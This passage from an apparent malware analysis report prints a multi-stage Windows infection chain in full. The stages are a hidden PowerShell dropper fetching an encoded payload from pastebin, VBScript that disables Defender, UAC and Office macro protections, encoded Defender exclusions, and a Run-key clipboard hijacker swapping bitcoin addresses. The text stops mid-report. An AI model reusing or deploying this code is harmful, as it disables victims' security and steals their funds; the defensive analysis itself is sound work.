<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe -nologo -WindowStyle Hidden $_Xpin = ((New-Object Net.WebClient).DowNloAdSTRiNg(‘h’+’t’+’t’+’p’+’s’+’:’+’/’+’/’+’p’+’a’+’s’+’t’+’e’+’b’+’i’+’n’+’.’+’c’+’o’+’m’+’/’+’r’+’a’+’w’+’/ygwLUS9C’));$_Xpin=$_Xpin.replace(‘.’,’*!(@*#(!@#*’).replace(‘*!(@*#(!@#*’,’0′);$_Xpin = $_Xpin.ToCharArray();[Array]::Reverse($_Xpin);[byte[]]$_PMP = [System.Convert]::FromBase64String($_Xpin);$_1 = [System.Threading.Thread]::GetDomain().Load($_PMP);$_1.EntryPoint.invoke($S,$X)”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 4

This script downloads and executes another script from pastebin: ygwLUS9C. It is a base64 encoded script with some basic string replacing. We also noticed this executable uses the CMSTP bypass technique (T1191), already seen in our previous report.

Figure 11: CMSTP Bypass evidence

However, in this case, there is a new element differently the previous version: through the CMSTP bypass, a VBS script is written in the “\%TEMP%\” folder, which executes many disruptive commands:

Figure 12: Evidence of the VBS script loaded and executed

The VBS script, as also mentioned inside the first row as comment, has the objective to set to zero the level of security of the infected machine. The script is the following:

‘this script will put system on 0 securityIf Not WScript.Arguments.Named.Exists(“elevate”) Then  CreateObject(“Shell.Application”).ShellExecute WScript.FullName _    , “””” & WScript.ScriptFullName & “”” /elevate”, “”, “runas”, 1  WScript.QuitEnd If
On Error Resume NextSet WshShell = CreateObject(“WScript.Shell”)WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection”,”0″,”REG_DWORD”WshShell.RegWrite “HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable”,”0″,”REG_DWORD”
WScript.Sleep 100
outputMessage(“Set-MpPreference -DisableRealtimeMonitoring $true”)outputMessage(“Set-MpPreference -DisableBehaviorMonitoring $true”)outputMessage(“Set-MpPreference -DisableBlockAtFirstSeen $true”)outputMessage(“Set-MpPreference -DisableIOAVProtection $true”)outputMessage(“Set-MpPreference -DisableScriptScanning $true”)outputMessage(“Set-MpPreference -SubmitSamplesConsent 2”)outputMessage(“Set-MpPreference -MAPSReporting 0”)outputMessage(“Set-MpPreference -HighThreatDefaultAction 6 -Force”)outputMessage(“Set-MpPreference -ModerateThreatDefaultAction 6”)outputMessage(“Set-MpPreference -LowThreatDefaultAction 6”)outputMessage(“Set-MpPreference -SevereThreatDefaultAction 6”)

Sub outputMessage(byval args)On Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell ” + args, null, objConfig, intProcessID)

End SubOn Error Resume NextConst HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell $cici=@(36,117,115,101,114,80,97,116,104,32,61,32,36,101,110,118,58,85,83,69,82,80,82,79,70,73,76,69,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,32,61,32,78,101,119,45,79,98,106,101,99,116,32,83,121,115,116,101,109,46,67,111,108,108,101,99,116,105,111,110,115,46,65,114,114,97,121,76,105,115,116,10,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,58,92,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,77,115,98,117,105,108,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,67,97,108,99,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,112,111,119,101,114,115,104,101,108,108,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,119,115,99,114,105,112,116,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,109,115,104,116,97,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,46,65,100,100,40,39,99,109,100,46,101,120,101,39,41,32,62,32,36,110,117,108,108,10,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,32,61,32,39,100,58,92,39,10,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,112,114,111,106,101,99,116,115,70,111,108,100,101,114,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,97,116,104,69,120,99,108,117,115,105,111,110,115,41,32,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,97,116,104,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,97,116,104,32,36,101,120,99,108,117,115,105,111,110,10,125,10,102,111,114,101,97,99,104,32,40,36,101,120,99,108,117,115,105,111,110,32,105,110,32,36,112,114,111,99,101,115,115,69,120,99,108,117,115,105,111,110,115,41,10,123,10,32,32,32,32,87,114,105,116,101,45,72,111,115,116,32,34,65,100,100,105,110,103,32,80,114,111,99,101,115,115,32,69,120,99,108,117,115,105,111,110,58,32,34,32,36,101,120,99,108,117,115,105,111,110,10,32,32,32,32,65,100,100,45,77,112,80,114,101,102,101,114,101,110,99,101,32,45,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115,32,36,101,120,99,108,117,115,105,111,110,10,125,10,87,114,105,116,101,45,72,111,115,116,32,34,34,10,87,114,105,116,101,45,72,111,115,116,32,34,89,111,117,114,32,69,120,99,108,117,115,105,111,110,115,58,34,10,36,112,114,101,102,115,32,61,32,71,101,116,45,77,112,80,114,101,102,101,114,101,110,99,101,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,97,116,104,10,36,112,114,101,102,115,46,69,120,99,108,117,115,105,111,110,80,114,111,99,101,115,115);[System.Text.Encoding]::ASCII.GetString($cici)|IEX”, null, objConfig, intProcessID)
CreateObject(“WScript.Shell”).RegWrite “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA”,”0″, “REG_DWORD”

Set wso = CreateObject(“WScript.Shell”)wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\VBAWarnings”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableInternetFilesInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableAttachementsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Publisher\Security\ProtectedView\DisableUnsafeLocationsInPV”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Options\DontUpdateLinks”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Word\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\11.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\12.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\14.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\15.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”wso.RegWrite “HKCU\Software\Microsoft\Office\16.0\Excel\Security\AllowDDE”, 1, “REG_DWORD”

Code Snippet 5

As seen in the code a powershell command is hidden inside the variable named $cici, which is immediately converted from the decimal to the relative ascii value. 

$userPath = $env:USERPROFILE$pathExclusions = New-Object System.Collections.ArrayList$processExclusions = New-Object System.Collections.ArrayList$pathExclusions.Add(‘C:\’) > $null$processExclusions.Add(‘Msbuild.exe’) > $null$processExclusions.Add(‘Calc.exe’) > $null$processExclusions.Add(‘powershell.exe’) > $null$processExclusions.Add(‘wscript.exe’) > $null$processExclusions.Add(‘mshta.exe’) > $null$processExclusions.Add(‘cmd.exe’) > $null$projectsFolder = ‘d:\’Add-MpPreference -ExclusionPath $projectsFolderforeach ($exclusion in $pathExclusions){    Write-Host “Adding Path Exclusion: ” $exclusion    Add-MpPreference -ExclusionPath $exclusion}foreach ($exclusion in $processExclusions){    Write-Host “Adding Process Exclusion: ” $exclusion    Add-MpPreference -ExclusionProcess $exclusion}Write-Host “”Write-Host “Your Exclusions:”$prefs = Get-MpPreference$prefs.ExclusionPath$prefs.ExclusionProcess

Code snippet 6

In Code Snippet 6 we found a powershell code instructed to insert in the Microsoft Windows Anti-Malware exclusions the following processes: msbuild, calc, powershell, wscript, mshta and cmd.

Another script in this intricated chain is YL0je2fU:

<script language=”&#86;&#66;&#83;&#99;&#114;&#105;&#112;&#116;”>
CreateObject(“WScript.Shell”).RegWrite “HKCU\Software\Microsoft\Windows\CurrentVersion\Run\replcia”, “mshta vbscript:Execute(“”CreateObject(“”””Wscript.Shell””””).Run “”””powershell ((gp HKCU:\Software).mogale)|IEX””””, 0 : window.close””)”, “REG_SZ”

CreateObject(“Wscript.Shell”).regwrite “HKCU\Software\mogale”, “$cici=@(102,117,110,99,116,105,111,110,32,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,91,115,116,114,105,110,103,93,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,10,123,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,91,48,93,32,45,110,101,32,39,49,39,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,115,116,114,76,101,110,103,116,104,32,61,32,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,46,108,101,110,103,116,104,10,9,105,102,40,36,115,116,114,76,101,110,103,116,104,32,45,108,116,32,50,54,32,45,111,114,32,36,115,116,114,76,101,110,103,116,104,32,45,103,116,32,51,53,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,36,118,97,108,105,100,82,101,103,101,120,32,61,32,39,94,91,97,45,122,65,45,90,48,45,57,92,115,93,43,36,39,10,9,105,102,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,111,116,109,97,116,99,104,32,36,118,97,108,105,100,82,101,103,101,120,41,10,9,123,10,9,9,114,101,116,117,114,110,32,36,102,97,108,115,101,10,9,125,10,10,9,114,101,116,117,114,110,32,36,116,114,117,101,10,125,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,32,61,32,40,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,44,32,34,49,57,107,67,99,100,98,116,116,84,65,88,49,109,76,85,51,72,107,57,83,50,66,87,53,99,75,76,70,68,49,122,49,87,34,41,10,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,46,108,101,110,103,116,104,10,36,105,32,61,32,48,10,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,34,34,10,119,104,105,108,101,40,49,41,10,123,10,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,61,32,71,101,116,45,67,108,105,112,98,111,97,114,100,10,9,105,102,40,40,105,115,66,105,116,99,111,105,110,65,100,100,114,101,115,115,40,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,41,41,32,45,99,101,113,32,36,116,114,117,101,32,45,97,110,100,10,9,9,36,99,108,105,112,98,111,97,114,100,67,111,110,116,101,110,116,32,45,99,110,101,32,36,111,108,100,65,100,100,114,101,115,115,83,101,116,41,10,9,123,10,9,9,83,101,116,45,67,108,105,112,98,111,97,114,100,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,111,108,100,65,100,100,114,101,115,115,83,101,116,32,61,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,91,36,105,93,10,9,9,36,105,32,61,32,40,36,105,32,43,32,49,41,32,37,32,36,98,105,116,99,111,105,110,65,100,100,114,101,115,115,101,115,83,105,122,101,10,9,125,10,125);[System.Text.Encoding]::ASCII.GetString($cici)|IEX” , “REG_SZ”
Const HIDDEN_WINDOW = 0strComputer = “.”Set objWMIService = GetObject(“winmgmts:” & “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2”)Set objStartup = objWMIService.Get(“Win32_ProcessStartup”)Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject(“winmgmts:root\cimv2:Win32_Process”)errReturn = objProcess.Create( “powershell.exe ((gp HKCU:\Software).mogale)|IEX”, null, objConfig, intProcessID)
self.close
</script>

Code Snippet 7

Even in this case there is a powershell script embedded in it using the same variable name “$cici”, but with the following body:

function isBitcoinAddress([string]$clipboardContent){ if($clipboardContent[0] -ne ‘1’) { return $false }
$strLength = $clipboardContent.length if($strLength -lt 26 -or $strLength -gt 35) { return $false }
$validRegex = ‘^[a-zA-Z0-9\s]+$’ if($clipboardContent -cnotmatch $validRegex) { return $false }
return $true}$bitcoinAddresses = (“19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”, “19kCcdbttTAX1mLU3Hk9S2BW5cKLFD1z1W”)$bitcoinAddressesSize = $bitcoinAddresses.length$i = 0$oldAddressSet = “”while(1){ $clipboardContent = Get-Clipboard if((isBitcoinAddress($clipboardContent)) -ceq $true -and $clipboardContent -cne $oldAddressSet) { Set-Clipboard $bitcoinAddresses[$i] $oldAddressSet = $bitcoinAddresses[$i] $i = ($i + 1) % $bitcoinAddressesSize }}

Code Snippet 8

The script performs a constant check in the clipboard of the victim machine, looking for bitcoin addresses and some of them are also hardcoded. The last stage is UyFaSxgj:

